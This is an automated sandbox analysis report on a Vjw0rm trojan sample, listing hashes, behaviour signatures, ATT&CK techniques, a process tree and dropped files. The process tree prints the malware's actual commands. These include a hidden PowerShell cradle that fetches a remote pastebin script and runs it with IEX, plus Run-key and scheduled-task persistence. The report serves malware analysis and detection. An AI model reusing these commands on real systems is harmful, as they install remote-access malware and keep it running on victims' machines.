vjw0rm | 4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2

Analysis

max time kernel
149s
max time network
153s
platform
windows10_x64
resource
win10v20210410
submitted
17-05-2021 02:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe
Size

2.5MB
MD5

1ba6b23a139f0f46c31f74b174f48be2
SHA1

1c7a38a017f9444dbb6879279d4e12c2cc01c83c
SHA256

4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2
SHA512

f0b788429de97fde2c3575d845a6cbe19fe22a3562417005a5db26dedc57cbfd27b914d8c8a12c58c6eabab0eeea6e7caf62e40cadbb286c4287e5c417a00565

Score

10^/10

vjw0rm persistence trojan upx worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/gC5dfjh9

Signatures

Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm

Blocklisted process makes network request 10 IoCs

Processes:

WScript.exepowershell.execmd.exe

flow	pid	process
10	3556	WScript.exe
13	2448	powershell.exe
14	2448	powershell.exe
33	2648	cmd.exe
34	2648	cmd.exe
35	3556	WScript.exe
36	3556	WScript.exe
37	3556	WScript.exe
38	3556	WScript.exe
39	3556	WScript.exe

Executes dropped EXE 2 IoCs

Processes:

setup.exesetup.tmp

pid process

3864 setup.exe
2332 setup.tmp

pid	process
3864	setup.exe
2332	setup.tmp

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/2396-165-0x0000000000400000-0x0000000000A16000-memory.dmp	upx
behavioral2/memory/2396-166-0x0000000000400000-0x0000000000A16000-memory.dmp	upx

Drops startup file 5 IoCs

Processes:

WScript.exeWScript.exewscript.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\setup.js	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllm.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllm.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NkeGMKDHuN.url	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\setup.js	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dllm.vbs"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dllm.vbs"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 14 IoCs

Processes:

powershell.execmd.exe

description	pid	process	target process
PID 2448 set thread context of 2648	2448	powershell.exe	cmd.exe
PID 2648 set thread context of 2396	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 2832	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 184	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 1796	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 3908	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 2836	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 4068	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 3288	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 2328	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 1092	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 2236	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 2988	2648	cmd.exe	notepad.exe
PID 2648 set thread context of 4072	2648	cmd.exe	notepad.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 13 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2416	2396	WerFault.exe	notepad.exe
3936	2832	WerFault.exe	notepad.exe
2784	184	WerFault.exe	notepad.exe
836	1796	WerFault.exe	notepad.exe
3612	3908	WerFault.exe	notepad.exe
3884	2836	WerFault.exe	notepad.exe
1680	4068	WerFault.exe	notepad.exe
3448	3288	WerFault.exe	notepad.exe
3984	2328	WerFault.exe	notepad.exe
1476	1092	WerFault.exe	notepad.exe
2720	2236	WerFault.exe	notepad.exe
2716	2988	WerFault.exe	notepad.exe
1744	4072	WerFault.exe	notepad.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3936 schtasks.exe

pid	process
3936	schtasks.exe

Modifies registry class 1 IoCs

Processes:

4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe

Suspicious behavior: EnumeratesProcesses 61 IoCs

Processes:

powershell.execmd.exepowershell.exepowershell.exe

pid	process
2448	powershell.exe
2448	powershell.exe
2448	powershell.exe
2448	powershell.exe
2448	powershell.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2696	powershell.exe
2696	powershell.exe
2696	powershell.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2940	powershell.exe
2940	powershell.exe
2940	powershell.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe
2648	cmd.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

powershell.execmd.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2648	cmd.exe
Token: SeDebugPrivilege	2648	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exesetup.exeWScript.execmd.exeWScript.exepowershell.execmd.execmd.exe

description	pid	process	target process
PID 2112 wrote to memory of 208	2112	4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe	WScript.exe
PID 2112 wrote to memory of 208	2112	4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe	WScript.exe
PID 2112 wrote to memory of 208	2112	4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe	WScript.exe
PID 2112 wrote to memory of 3556	2112	4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe	WScript.exe
PID 2112 wrote to memory of 3556	2112	4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe	WScript.exe
PID 2112 wrote to memory of 3556	2112	4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe	WScript.exe
PID 2112 wrote to memory of 3864	2112	4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe	setup.exe
PID 2112 wrote to memory of 3864	2112	4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe	setup.exe
PID 2112 wrote to memory of 3864	2112	4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe	setup.exe
PID 3864 wrote to memory of 2332	3864	setup.exe	setup.tmp
PID 3864 wrote to memory of 2332	3864	setup.exe	setup.tmp
PID 3864 wrote to memory of 2332	3864	setup.exe	setup.tmp
PID 208 wrote to memory of 1904	208	WScript.exe	cmd.exe
PID 208 wrote to memory of 1904	208	WScript.exe	cmd.exe
PID 208 wrote to memory of 1904	208	WScript.exe	cmd.exe
PID 1904 wrote to memory of 2448	1904	cmd.exe	powershell.exe
PID 1904 wrote to memory of 2448	1904	cmd.exe	powershell.exe
PID 1904 wrote to memory of 2448	1904	cmd.exe	powershell.exe
PID 3556 wrote to memory of 3936	3556	WScript.exe	schtasks.exe
PID 3556 wrote to memory of 3936	3556	WScript.exe	schtasks.exe
PID 3556 wrote to memory of 3936	3556	WScript.exe	schtasks.exe
PID 2448 wrote to memory of 2196	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2196	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2196	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2648	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2648	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2648	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2648	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2648	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2648	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2648	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2648	2448	powershell.exe	cmd.exe
PID 2448 wrote to memory of 2648	2448	powershell.exe	cmd.exe
PID 2648 wrote to memory of 208	2648	cmd.exe	WScript.exe
PID 2648 wrote to memory of 208	2648	cmd.exe	WScript.exe
PID 2648 wrote to memory of 2396	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2396	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2396	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2396	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2396	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2396	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2396	2648	cmd.exe	notepad.exe
PID 208 wrote to memory of 2696	208	WScript.exe	powershell.exe
PID 208 wrote to memory of 2696	208	WScript.exe	powershell.exe
PID 208 wrote to memory of 2696	208	WScript.exe	powershell.exe
PID 2648 wrote to memory of 2396	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2832	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2832	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2832	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2832	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2832	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2832	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2832	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 2832	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 1096	2648	cmd.exe	cmd.exe
PID 2648 wrote to memory of 1096	2648	cmd.exe	cmd.exe
PID 2648 wrote to memory of 1096	2648	cmd.exe	cmd.exe
PID 1096 wrote to memory of 2980	1096	cmd.exe	wscript.exe
PID 1096 wrote to memory of 2980	1096	cmd.exe	wscript.exe
PID 1096 wrote to memory of 2980	1096	cmd.exe	wscript.exe
PID 2648 wrote to memory of 184	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 184	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 184	2648	cmd.exe	notepad.exe
PID 2648 wrote to memory of 184	2648	cmd.exe	notepad.exe

C:\Users\Admin\AppData\Local\Temp\4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe
"C:\Users\Admin\AppData\Local\Temp\4ac6131d639aa802302ab4cf32b959f9ab5ec76752cc297eb380d5c23d4a68f2.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dllm.vbs"
2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.DownloadString('https://pastebin.com/raw/gC5dfjh9'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.DownloadString('https://pastebin.com/raw/gC5dfjh9'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exit
4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe"
5⤵
PID:2196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe"
5⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfg"
6⤵
PID:2396

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2396 -s 180
7⤵
- Program crash
PID:2416

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:2832

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2832 -s 120
7⤵
- Program crash
PID:3936

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C WScript "C:\ProgramData\GNUQlUqfKY\r.vbs"
6⤵
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\SysWOW64\wscript.exe
WScript "C:\ProgramData\GNUQlUqfKY\r.vbs"
7⤵
- Drops startup file
PID:2980

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:184

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 184 -s 180
7⤵
- Program crash
PID:2784

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:1796

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1796 -s 192
7⤵
- Program crash
PID:836

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:3908

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3908 -s 112
7⤵
- Program crash
PID:3612

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:2836

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2836 -s 180
7⤵
- Program crash
PID:3884

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:4068

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4068 -s 188
7⤵
- Program crash
PID:1680

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:3288

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3288 -s 120
7⤵
- Program crash
PID:3448

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:2328

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2328 -s 180
7⤵
- Program crash
PID:3984

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:1092

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1092 -s 112
7⤵
- Program crash
PID:1476

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:2236

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2236 -s 108
7⤵
- Program crash
PID:2720

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:2988

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2988 -s 180
7⤵
- Program crash
PID:2716

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:4072

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4072 -s 188
7⤵
- Program crash
PID:1744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value 'C:\Users\Admin\AppData\Local\Temp\dllm.vbs'
3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value 'C:\Users\Admin\AppData\Local\Temp\dllm.vbs'
3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\setup.js"
2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3556

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn anydesk /tr "C:\Users\Admin\AppData\Local\Temp\setup.js
3⤵
- Creates scheduled task(s)
PID:3936

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3864

C:\Users\Admin\AppData\Local\Temp\is-EC479.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EC479.tmp\setup.tmp" /SL5="$301C2,1940541,119296,C:\Users\Admin\AppData\Local\Temp\setup.exe"
3⤵
- Executes dropped EXE
PID:2332

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GNUQlUqfKY\r.vbs
MD5
a5a111d49c4a7f06ca0f3a6910d7f3f1

SHA1
96f8134fbdf1f17bcba3c165ffe0fcd0010a796c

SHA256
6e1529f62bf755b9720f539b4a5541bf4b4766f676eb3385749ab0cf8486536d

SHA512
e6bf8ae89a0068f550d22567ba5f4883fd7973cb0bfd358f77fa1d38782bf125cac34d2b598e8304bfa7dab0e3a3863eb2c4ebc151d58e81db0dba332367f0b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
8ef54aaad75b34176ccb5a596ac5c8b6

SHA1
40b02816f600190a30241042fee8ec0abeade8c2

SHA256
1a0f543898192e9c55784e7e2ab674efc9ee19a3f6a954787bccea29e475172e

SHA512
bad9dff1d3ac6794c2e14dec75152c278dca5938980e418659807254e152c500cb8fa302864afecc31764765e3cd55f92f8ab48be9bfe624d9396109612c031b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5dc5265fa0061d5a92f2e2dee577fdf2

SHA1
e8c9061fd7a94c854641318da20a14e19bb0e545

SHA256
6c56df9406555ffa56998bed6e7961be7f7cccc9fe3f7757f18e0b65e8a17edb

SHA512
0c4480e377912d5a463802e02c3661da851e03a78c3743c06d37e64d943ba6f0a1d8beb686e34d1e1217414ab22be1c2d711279d74d4979d3709ff2f9d15d285

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0d35a4ae5288094b0f3253561215a085

SHA1
943a247b83a8c9e39f9c6cd594c2b5d7062054bf

SHA256
113786a887afa6a4f85891cae4d5ca442ac75a14ef210f42162ee37362d3f3c8

SHA512
a0f4abec70ce0c472bf36c23e95e3b377f12c5b7a2b498d93d88553f973e24d263401a356cdafd4642c08b7b21931ec6ee19e158f499995024bee528c363f7de

Download Submit
C:\Users\Admin\AppData\Local\Temp\dllm.vbs
MD5
fd820480df12caf43951f5f89f8deefc

SHA1
c6a2c1f8a24282c10228ca332accf97da37f86ef

SHA256
705646f923a2412757bae71b60de0fef31284756768a59ef2057eaee7dfafe9f

SHA512
0e8601194dbe56933c57805a59624b11414cfbdced46e45d874f5e3e43bd4d7195e650b22d2c783a041e3725168e593ab823b399f995fe6960c3e3eb597a8f36

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-EC479.tmp\setup.tmp
MD5
e4a2856522e6a817e3f0edd2677fa647

SHA1
7cffea7ad238e4d2a64238139ab64802dbaf1185

SHA256
e11132ca9fb98307830147446f5f731e19e308949e1a473d177d5a9f7ddf9c7e

SHA512
25df15be9123496ed7f798ef892da334cc347016fcede7a6d4d580871926b2396923d71db9fdf8773dbca7a33e03bf33774c4bf2c9837918d1411eead573d964

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-EC479.tmp\setup.tmp
MD5
e4a2856522e6a817e3f0edd2677fa647

SHA1
7cffea7ad238e4d2a64238139ab64802dbaf1185

SHA256
e11132ca9fb98307830147446f5f731e19e308949e1a473d177d5a9f7ddf9c7e

SHA512
25df15be9123496ed7f798ef892da334cc347016fcede7a6d4d580871926b2396923d71db9fdf8773dbca7a33e03bf33774c4bf2c9837918d1411eead573d964

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
MD5
b45935c434d4f278f9e1339242942756

SHA1
74e1d97944471508c13e931d9f9f0a8414ff3ac2

SHA256
dce25f4104d88a877e981d48d039a7cf8adb324a0f4402f4034f2d4ff748b357

SHA512
bbb6c771f04e6fa8d5b545897c470b684c22cdc9b8725a20343304e0232d86b6f6f525dcd8dd99026befcbec80961998e8e064170e40de74441cb6e72bdf8d07

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
MD5
b45935c434d4f278f9e1339242942756

SHA1
74e1d97944471508c13e931d9f9f0a8414ff3ac2

SHA256
dce25f4104d88a877e981d48d039a7cf8adb324a0f4402f4034f2d4ff748b357

SHA512
bbb6c771f04e6fa8d5b545897c470b684c22cdc9b8725a20343304e0232d86b6f6f525dcd8dd99026befcbec80961998e8e064170e40de74441cb6e72bdf8d07

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.js
MD5
105a99610e0130f583a50a9e2fdaeafa

SHA1
783cb3e9264a255244349c4388ace41b3a2ec497

SHA256
a8dbcfebb709ccb40a3e54d7da9c04c2ba8498ae284d013ed6aa8acc819d751e

SHA512
a50de4256f3c0cb724e1e02b7b55497a60b8b1d71ed09bccd38cb7dec3703726c5a6cad58c895e0fede8ddb97b415e3cfd55aee3cbe2460209f36bf93a566d73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NkeGMKDHuN.url
MD5
4e08a19771d3104587b2f51787a026c8

SHA1
870e9851c2975f3368d353d6c928453a22437078

SHA256
4ea284524cfbc3bf26bc4fd02906fd82f9cef55aab72faa7904db48d97e4e27c

SHA512
47895a848f3c540a99974f98caa4b1e1a7a03003bfd52b3b35ccb733daf558416bf5523e076032f3f87dce01766a682a188b5b5f37e0bf212a6e468a0c574a88

Download Submit
memory/184-207-0x0000000000A14AA0-mapping.dmp

Download
memory/208-114-0x0000000000000000-mapping.dmp

Download
memory/208-164-0x00000000061C0000-0x0000000006394000-memory.dmp

Filesize
1.8MB

Download
memory/1092-223-0x0000000000A14AA0-mapping.dmp

Download
memory/1096-201-0x0000000000000000-mapping.dmp

Download
memory/1796-212-0x0000000000A14AA0-mapping.dmp

Download
memory/1904-127-0x0000000000000000-mapping.dmp

Download
memory/2236-224-0x0000000000A14AA0-mapping.dmp

Download
memory/2328-222-0x0000000000A14AA0-mapping.dmp

Download
memory/2332-122-0x0000000000000000-mapping.dmp

Download
memory/2332-126-0x00000000005C0000-0x00000000005C1000-memory.dmp

Filesize
4KB

Download
memory/2396-165-0x0000000000400000-0x0000000000A16000-memory.dmp

Filesize
6.1MB

Download
memory/2396-166-0x0000000000400000-0x0000000000A16000-memory.dmp

Filesize
6.1MB

Download
memory/2396-167-0x0000000000A14AA0-mapping.dmp

Download
memory/2448-131-0x0000000002D40000-0x0000000002D41000-memory.dmp

Filesize
4KB

Download
memory/2448-141-0x0000000007110000-0x0000000007111000-memory.dmp

Filesize
4KB

Download
memory/2448-150-0x0000000008B80000-0x0000000008B81000-memory.dmp

Filesize
4KB

Download
memory/2448-151-0x0000000006AF3000-0x0000000006AF4000-memory.dmp

Filesize
4KB

Download
memory/2448-154-0x00000000092F0000-0x00000000094C4000-memory.dmp

Filesize
1.8MB

Download
memory/2448-155-0x00000000094D0000-0x00000000094D1000-memory.dmp

Filesize
4KB

Download
memory/2448-135-0x0000000006CF0000-0x0000000006CF1000-memory.dmp

Filesize
4KB

Download
memory/2448-136-0x0000000007000000-0x0000000007001000-memory.dmp

Filesize
4KB

Download
memory/2448-134-0x0000000006AF2000-0x0000000006AF3000-memory.dmp

Filesize
4KB

Download
memory/2448-149-0x00000000095F0000-0x00000000095F1000-memory.dmp

Filesize
4KB

Download
memory/2448-138-0x00000000077B0000-0x00000000077B1000-memory.dmp

Filesize
4KB

Download
memory/2448-128-0x0000000000000000-mapping.dmp

Download
memory/2448-143-0x0000000007F20000-0x0000000007F21000-memory.dmp

Filesize
4KB

Download
memory/2448-142-0x0000000007ED0000-0x0000000007ED1000-memory.dmp

Filesize
4KB

Download
memory/2448-137-0x0000000006E90000-0x0000000006E91000-memory.dmp

Filesize
4KB

Download
memory/2448-133-0x0000000006AF0000-0x0000000006AF1000-memory.dmp

Filesize
4KB

Download
memory/2448-132-0x0000000007130000-0x0000000007131000-memory.dmp

Filesize
4KB

Download
memory/2648-163-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/2648-158-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/2648-159-0x0000000000404470-mapping.dmp

Download
memory/2696-190-0x0000000008C20000-0x0000000008C21000-memory.dmp

Filesize
4KB

Download
memory/2696-179-0x0000000007560000-0x0000000007561000-memory.dmp

Filesize
4KB

Download
memory/2696-193-0x0000000009240000-0x0000000009241000-memory.dmp

Filesize
4KB

Download
memory/2696-195-0x0000000006663000-0x0000000006664000-memory.dmp

Filesize
4KB

Download
memory/2696-192-0x0000000008960000-0x0000000008961000-memory.dmp

Filesize
4KB

Download
memory/2696-184-0x0000000007B40000-0x0000000007B41000-memory.dmp

Filesize
4KB

Download
